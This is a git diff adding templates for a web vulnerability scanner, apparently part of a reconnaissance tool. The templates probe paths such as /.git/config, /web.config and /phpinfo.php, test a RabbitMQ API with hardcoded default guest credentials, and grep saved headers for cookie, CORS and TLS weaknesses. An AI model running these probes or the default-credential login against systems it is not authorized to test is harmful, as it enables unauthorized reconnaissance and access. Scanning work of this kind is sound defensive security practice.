a/templates/active/Git_Config_Detected.sh b/templates/active/Git_Config_Detected.sh new file mode 100644 index 0000000..8378705 --- /dev/null +++ b/templates/active/Git_Config_Detected.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='Git Config Detected 1' +URI='/.git/config' +METHOD='GET' +MATCH="\[core\]" +SEVERITY='P3 - MEDIUM' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/Jira_Scanner_1.sh b/templates/active/Jira_Scanner_1.sh new file mode 100644 index 0000000..38264e1 --- /dev/null +++ b/templates/active/Jira_Scanner_1.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='Jira Detected 1' +URI='/secure/Dashboard.jspa' +METHOD='GET' +MATCH='Project Management Software' +SEVERITY='P5 - INFO' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/Jira_Scanner_2.sh b/templates/active/Jira_Scanner_2.sh new file mode 100644 index 0000000..416c290 --- /dev/null +++ b/templates/active/Jira_Scanner_2.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='Jira Detected 2' +URI='/jira/secure/Dashboard.jspa' +METHOD='GET' +MATCH='Project Management Software' +SEVERITY='P5 - INFO' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/Jira_Scanner_3.sh b/templates/active/Jira_Scanner_3.sh new file mode 100644 index 0000000..d257ab9 --- /dev/null +++ b/templates/active/Jira_Scanner_3.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='Jira Detected' +URI='/secure/ContactAdministrators!default.jspa' +METHOD='GET' +MATCH='Project Management Software' +SEVERITY='P5 - INFO' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/Joomla_Scanner_1.sh b/templates/active/Joomla_Scanner_1.sh new file mode 100644 index 0000000..b1f00a5 --- /dev/null +++ b/templates/active/Joomla_Scanner_1.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='Joomla Detected 1' +URI='/' +METHOD='GET' +MATCH='content="Joomla! ' +SEVERITY='P5 - INFO' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/Joomla_Scanner_2.sh b/templates/active/Joomla_Scanner_2.sh new file mode 100644 index 0000000..135d303 --- /dev/null +++ b/templates/active/Joomla_Scanner_2.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='Joomla Detected 1' +URI='/joomla/' +METHOD='GET' +MATCH='content="Joomla! ' +SEVERITY='P5 - INFO' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/Joomla_Version_Disclosure.sh b/templates/active/Joomla_Version_Disclosure.sh new file mode 100644 index 0000000..6a32f2a --- /dev/null +++ b/templates/active/Joomla_Version_Disclosure.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='Joomla Version Disclosure' +URI='/administrator/manifests/files/joomla.xml' +METHOD='GET' +MATCH='Joomla version ' +SEVERITY='P4 - LOW' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/MS_SQL_Reporting_Server_Scanner_1.sh b/templates/active/MS_SQL_Reporting_Server_Scanner_1.sh new file mode 100644 index 0000000..be71c44 --- /dev/null +++ b/templates/active/MS_SQL_Reporting_Server_Scanner_1.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='MS SQL Reporting Server Detected 1' +URI='/ReportServer/pages/ReportViewer.aspx' +METHOD='GET' +MATCH='Microsoft\.Reporting' +SEVERITY='P5 - INFO' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/MS_SQL_Reporting_Server_Scanner_2.sh b/templates/active/MS_SQL_Reporting_Server_Scanner_2.sh new file mode 100644 index 0000000..6dc6865 --- /dev/null +++ b/templates/active/MS_SQL_Reporting_Server_Scanner_2.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='MS SQL Reporting Server Detected 2' +URI='/Reports/Pages/Folder.aspx' +METHOD='GET' +MATCH='Microsoft\.Reporting' +SEVERITY='P5 - INFO' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/PHP_Info.sh b/templates/active/PHP_Info.sh new file mode 100644 index 0000000..27c17a9 --- /dev/null +++ b/templates/active/PHP_Info.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='PHP Info Detected 1' +URI='/phpinfo.php' +METHOD='GET' +MATCH='PHP Version ' +SEVERITY='P4 - LOW' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/PulseSecure_VPN_Detected.sh b/templates/active/PulseSecure_VPN_Detected.sh new file mode 100644 index 0000000..803b4e7 --- /dev/null +++ b/templates/active/PulseSecure_VPN_Detected.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='PulseSecure VPN Detected' +URI='/dana-na/auth/url_admin/welcome.cgi' +METHOD='GET' +MATCH='SSL' +SEVERITY='P5 - INFO' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/RabbitMQ_Management_Default_Credentials.sh b/templates/active/RabbitMQ_Management_Default_Credentials.sh new file mode 100644 index 0000000..85b6e17 --- /dev/null +++ b/templates/active/RabbitMQ_Management_Default_Credentials.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='RabbitMQ Management Default Credentials' +URI="/api/whoami" +METHOD='GET' +MATCH="administrator" +SEVERITY='P2 - HIGH' +CURL_OPTS='-H "Content-Type: application/json" -H "Authorization: Z3Vlc3Q6Z3Vlc3Q=" --user-agent '' -s -L --insecure' +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/SQLiteManager_Scanner_1.sh b/templates/active/SQLiteManager_Scanner_1.sh new file mode 100644 index 0000000..e48f1d0 --- /dev/null +++ b/templates/active/SQLiteManager_Scanner_1.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='SQLiteManager Detected' +URI='/sqlite/' +METHOD='GET' +MATCH='SQLiteManager' +SEVERITY='P5 - INFO' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/Telerik_File_Upload_Web_UI.sh b/templates/active/Telerik_File_Upload_Web_UI.sh new file mode 100644 index 0000000..9c92259 --- /dev/null +++ b/templates/active/Telerik_File_Upload_Web_UI.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='Telerik File Upload Web UI' +URI='/Telerik.Web.UI.WebResource.axd?type=rau' +METHOD='GET' +MATCH='RadAsyncUpload handler is registered succesfully' +SEVERITY='P2 - HIGH' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/Weak_Authentication_Scanner.sh b/templates/active/Weak_Authentication_Scanner.sh new file mode 100644 index 0000000..c9de6a9 --- /dev/null +++ b/templates/active/Weak_Authentication_Scanner.sh @@ -0,0 +1,13 @@ +AUTHOR='@xer0dayz' +VULN_NAME='Weak Authentication' +URI='/' +METHOD='GET' +MATCH='realm\=' +SEVERITY='P4 - LOW' +CURL_OPTS="-I -L --user-agent '' -s --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' + +if [[ "$SSL" == "false" ]]; then + SEVERITY='P2 - HIGH' +fi \ No newline at end of file diff --git a/templates/active/WebLogic_Scanner.sh b/templates/active/WebLogic_Scanner.sh new file mode 100644 index 0000000..50b664c --- /dev/null +++ b/templates/active/WebLogic_Scanner.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='WebLogic Detected' +URI='/console/login/LoginForm.jsp' +METHOD='GET' +MATCH='WebLogic' +SEVERITY='P5 - INFO' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/Web_Config_Detected.sh b/templates/active/Web_Config_Detected.sh new file mode 100644 index 0000000..3af43ad --- /dev/null +++ b/templates/active/Web_Config_Detected.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='Web Config Detected 1' +URI='/web.config' +METHOD='GET' +MATCH='<configuration>' +SEVERITY='P4 - LOW' +CURL_OPTS="-L --user-agent '' -s --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/Wordpres_Scanner_1.sh b/templates/active/Wordpres_Scanner_1.sh new file mode 100644 index 0000000..2e463b9 --- /dev/null +++ b/templates/active/Wordpres_Scanner_1.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='Wordpress Detected 1' +URI='/' +METHOD='GET' +MATCH="content\=\"WordPress\ " +SEVERITY='P5 - INFO' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/Wordpres_Scanner_2.sh b/templates/active/Wordpres_Scanner_2.sh new file mode 100644 index 0000000..21b69c6 --- /dev/null +++ b/templates/active/Wordpres_Scanner_2.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='Wordpress Detected 2' +URI='/blog/' +METHOD='GET' +MATCH="content\=\"WordPress\ " +SEVERITY='P5 - INFO' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/Wordpres_Scanner_3.sh b/templates/active/Wordpres_Scanner_3.sh new file mode 100644 index 0000000..336c4d5 --- /dev/null +++ b/templates/active/Wordpres_Scanner_3.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='Wordpress Detected 3' +URI='/wordpress/' +METHOD='GET' +MATCH="content\=\"WordPress\ " +SEVERITY='P5 - INFO' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/phpMyAdmin_Scanner_1.sh b/templates/active/phpMyAdmin_Scanner_1.sh new file mode 100644 index 0000000..cb3f85d --- /dev/null +++ b/templates/active/phpMyAdmin_Scanner_1.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='phpMyAdmin Detected' +URI='/phpmyadmin/' +METHOD='GET' +MATCH='<title>phpMyAdmin ' +SEVERITY='P5 - INFO' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/passive/Autocomplete_Enabled.sh b/templates/passive/Autocomplete_Enabled.sh new file mode 100644 index 0000000..4ea02ce --- /dev/null +++ b/templates/passive/Autocomplete_Enabled.sh @@ -0,0 +1,8 @@ +AUTHOR='@xer0dayz' +VULN_NAME='Autocomplete Enabled' +FILENAME="$LOOT_DIR/web/websource-$TARGET-*.txt" +MATCH='autocomplete=\"on\"' +SEVERITY='P4 - LOW' +GREP_OPTIONS='-i' +SEARCH='positive' +SECONDARY_COMMANDS='' \ No newline at end of file diff --git a/templates/passive/CORS_Policy_-_Allow-Credentials_Enabled.sh b/templates/passive/CORS_Policy_-_Allow-Credentials_Enabled.sh new file mode 100644 index 0000000..c1abf8c --- /dev/null +++ b/templates/passive/CORS_Policy_-_Allow-Credentials_Enabled.sh @@ -0,0 +1,8 @@ +AUTHOR='@xer0dayz' +VULN_NAME='CORS Policy - Allow-Credentials Enabled' +FILENAME="$LOOT_DIR/web/headers-htt*-$TARGET.txt" +MATCH='Access-Control-Allow-Credentials: true' +SEVERITY='P4 - LOW' +GREP_OPTIONS='-i' +SEARCH='positive' +SECONDARY_COMMANDS='' \ No newline at end of file diff --git a/templates/passive/Clear-text_Communications_HTTP.disabled b/templates/passive/Clear-text_Communications_HTTP.disabled new file mode 100644 index 0000000..72bee3f --- /dev/null +++ b/templates/passive/Clear-text_Communications_HTTP.disabled @@ -0,0 +1,8 @@ +AUTHOR='@xer0dayz' +VULN_NAME='Clear-Text Protocol - HTTP' +FILENAME="$LOOT_DIR/web/headers-http-$TARGET.txt" +MATCH='200 OK' +SEVERITY='P2 - HIGH' +GREP_OPTIONS='-i' +SEARCH='positive' +SECONDARY_COMMANDS='' \ No newline at end of file diff --git a/templates/passive/Clickjacking.sh b/templates/passive/Clickjacking.sh new file mode 100644 index 0000000..04ecaf4 --- /dev/null +++ b/templates/passive/Clickjacking.sh @@ -0,0 +1,8 @@ +AUTHOR='@xer0dayz' +VULN_NAME='Clickjacking' +FILENAME="$LOOT_DIR/web/headers-htt*-$TARGET.txt" +MATCH='X-Frame-Options' +SEVERITY='P4 - LOW' +GREP_OPTIONS='-i' +SEARCH="negative" +SECONDARY_COMMANDS='' \ No newline at end of file diff --git a/templates/passive/Drupal_Detected.sh b/templates/passive/Drupal_Detected.sh new file mode 100644 index 0000000..ef4c35f --- /dev/null +++ b/templates/passive/Drupal_Detected.sh @@ -0,0 +1,8 @@ +AUTHOR='@xer0dayz' +VULN_NAME='Drupal Detected' +FILENAME="$LOOT_DIR/web/headers-htt*-$TARGET.txt" +MATCH='X-Generator: Drupal ' +SEVERITY='P5 - INFO' +GREP_OPTIONS='-i' +SEARCH='positive' +SECONDARY_COMMANDS='' \ No newline at end of file diff --git a/templates/passive/Expired_SSL_Certificate.sh b/templates/passive/Expired_SSL_Certificate.sh new file mode 100644 index 0000000..a1001ba --- /dev/null +++ b/templates/passive/Expired_SSL_Certificate.sh @@ -0,0 +1,8 @@ +AUTHOR='@xer0dayz' +VULN_NAME='Expired SSL Certificate' +FILENAME="$LOOT_DIR/web/curldebug-$TARGET.txt" +MATCH='certificate has expired' +SEVERITY='P3 - MEDIUM' +GREP_OPTIONS='' +SEARCH='positive' +SECONDARY_COMMANDS='' \ No newline at end of file diff --git a/templates/passive/Insecure_Cookie_-_HTTPOnly_Not_Set.sh b/templates/passive/Insecure_Cookie_-_HTTPOnly_Not_Set.sh new file mode 100644 index 0000000..c7bded7 --- /dev/null +++ b/templates/passive/Insecure_Cookie_-_HTTPOnly_Not_Set.sh @@ -0,0 +1,8 @@ +AUTHOR='@xer0dayz' +VULN_NAME='Insecure Cookie - HTTPOnly Not Set' +FILENAME="$LOOT_DIR/web/headers-htt*-$TARGET.txt" +MATCH='Set-Cookie' +SEVERITY='P3 - MEDIUM' +GREP_OPTIONS='-i' +SEARCH='positive' +SECONDARY_COMMANDS=' | egrep -iv httponly' \ No newline at end of file diff --git a/templates/passive/Insecure_Cookie_-_Secure_Not_Set.sh b/templates/passive/Insecure_Cookie_-_Secure_Not_Set.sh new file mode 100644 index 0000000..6ee7ac8 --- /dev/null +++ b/templates/passive/Insecure_Cookie_-_Secure_Not_Set.sh @@ -0,0 +1,8 @@ +AUTHOR='@xer0dayz' +VULN_NAME='Insecure Cookie - Secure Not Set' +FILENAME="$LOOT_DIR/web/headers-htt*-$TARGET.txt" +MATCH='Set-Cookie' +SEVERITY='P3 - MEDIUM' +GREP_OPTIONS='-i' +SEARCH='positive' +SECONDARY_COMMANDS=' | egrep -iv secure' \ No newline at end of file diff --git a/templates/passive/Insecure_SSL_TLS_Connection.sh b/templates/passive/Insecure_SSL_TLS_Connection.sh new file mode 100644 index 0000000..fa0611e --- /dev/null +++ b/templates/passive/Insecure_SSL_TLS_Connection.sh @@ -0,0 +1,8 @@ +AUTHOR='@xer0dayz' +VULN_NAME='Weak SSL TLS Protocols' +FILENAME="$LOOT_DIR/web/sslscan-$TARGET.txt" +MATCH=' SSLv' +SEVERITY='P2 - HIGH' +GREP_OPTIONS='-i' +SEARCH='positive' +SECONDARY_COMMANDS='' \ No newline at end of file diff --git a/templates/passive/Insecure_SSL_TLS_Connection_CN_Mismatch.sh b/templates/passive/Insecure_SSL_TLS_Connection_CN_Mismatch.sh new file mode 100644 index 0000000..821e669 --- /dev/null +++ b/templates/passive/Insecure_SSL_TLS_Connection_CN_Mismatch.sh @@ -0,0 +1,8 @@ +AUTHOR='@xer0dayz' +VULN_NAME='Insecure SSL TLS Connection CN Mismatch' +FILENAME="$LOOT_DIR/web/curldebug-$TARGET.txt" +MATCH='failed to verify the legitimacy of the server' +SEVERITY='P3 - MEDIUM' +GREP_OPTIONS='-i' +SEARCH='positive' +SECONDARY_COMMANDS='' \ No newline at end of file diff --git a/templates/passive/Lack_of_SPF_DNS_Record.sh b/templates/passive/Lack_of_SPF_DNS_Record.sh new file mode 100644 index 0000000..80df31a --- /dev/null +++ b/templates/passive/Lack_of_SPF_DNS_Record.sh @@ -0,0 +1,8 @@ +AUTHOR='@xer0dayz' +VULN_NAME='Lack of SPF DNS Record' +FILENAME="$LOOT_DIR/nmap/email-$TARGET-*.txt" +MATCH='\[\+\] Spoofing possible' +SEVERITY='P4 - LOW' +GREP_OPTIONS='-i' +SEARCH='positive' +SECONDARY_COMMANDS='' \ No newline at end of file diff --git a/templates/passive/Trace_Method_Enabled.sh b/templates/passive/Trace_Method_Enabled.sh new file mode 100644 index 0000000..733f12b --- /dev/null +++ b/templates/passive/Trace_Method_Enabled.sh @@ -0,0 +1,8 @@ +AUTHOR='@xer0dayz' +VULN_NAME='TRACE Method Enabled' +FILENAME="$LOOT_DIR/web/http_options-$TARGET-*.txt" +MATCH='TRACE' +SEVERITY='P4 - LOW' +GREP_OPTIONS='-i' +SEARCH='positive' +SECONDARY_COMMANDS='' \ No newline at end of file diff --git a/templates/passive/X-Powered-By_Header_Found.sh b/templates/passive/X-Powered-By_Header_Found.sh new file mode 100644 index 0000000..9fde91f --- /dev/null +++ b/templates/passive/X-Powered-By_Header_Found.sh @@ -0,0 +1,8 @@ +AUTHOR='@xer0dayz' +VULN_NAME='X-Powered-By Header Found' +FILENAME="$LOOT_DIR/web/headers-htt*-$TARGET.txt" +MATCH='X-Powered-By' +SEVERITY='P5 - INFO' +GREP_OPTIONS='-i' +SEARCH='positive' +SECONDARY_COMMANDS='' \ No newline at end of file